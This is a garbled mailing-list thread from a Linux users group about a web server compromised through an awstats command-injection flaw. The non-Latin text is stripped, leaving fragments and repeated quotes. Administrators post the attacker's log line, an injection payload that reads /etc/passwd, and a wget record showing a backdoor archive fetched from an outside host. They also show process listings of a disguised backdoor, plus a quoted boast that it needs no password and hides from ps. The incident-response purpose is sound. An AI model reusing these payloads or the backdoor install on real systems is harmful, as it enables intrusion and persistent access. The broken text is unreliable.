:
http://www.rootkit.nl/projects/rootkit_hunter.html
--
=+==+==+==+==+==+==+==+==+==+==+==+=
Dragomir Zhelev
Network Administrator IT Support
Varna,Bulgaria
[EMAIL PROTECTED]
=+==+==+==+==+==+==+==+==+==+==+==+=
. .
awstats.
psybnc, tw port backdoor
.
:
:
82.96.126.130 - - [22/Feb/2005:22:06:11 +0200] GET
/cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%
On Wed, Feb 23, 2005 at 12:06:48AM +0200, D. Dilev wrote:
:
pw2 :
top
4021 nobody 9 0 336 336 284 S 0.0 0.1 0:00 0 x0a
4028 nobody 9 0 260 260 216 S 0.0 0.1 0:00 0 x0b
:)
ps ax x0b syslogd, x0a
.
x0a x0b 2
:
pw2 :
top
4021 nobody 9 0 336 336 284 S 0.0 0.1 0:00 0 x0a
4028 nobody 9 0 260 260 216 S 0.0 0.1 0:00 0 x0b
:)
ps ax x0b syslogd, x0a
.
x0a x0b 2tw.tar.gz, ...
psyBNC- http://www.psychoid.net/
On Tue, Feb 22, 2005 at 11:31:38PM +0200, D. Dilev wrote:
[format recovered, wrap- 72 ...
http://www.lemis.com/email/email-format.html]
:)
awstats 2.
.
22:04 awstats
. :
#tail -f /var/log/apache/*
...
awstats error.log :
http://www.idefense.com/application/poi/display?id=185type=vulnerabilitiesflashstatus=true
On , 2005-02-22 at 23:31 +0200, D. Dilev wrote:
:)
awstats 2.
.
22:04 awstats
. :
#tail -f /var/log/apache/*
... awstats
error.log :
D. Dilev wrote:
:)
awstats 2.
.
22:04 awstats .
:
#tail -f /var/log/apache/*
... awstats error.log
:
cut
sh: line 1: /awstats.mydomain.com.conf: No such file or directory
--22:04:48-- http://www.petry.se/public_html/tw.tar.gz
=
D. Dilev wrote:
59768 port backdoor
no password needed , easy to install and hiding from ps and ps ax:D
have phun !
wget at home.ro
.
--
Georgi Genov
[EMAIL PROTECTED]
A mail-list of Linux Users Group - Bulgaria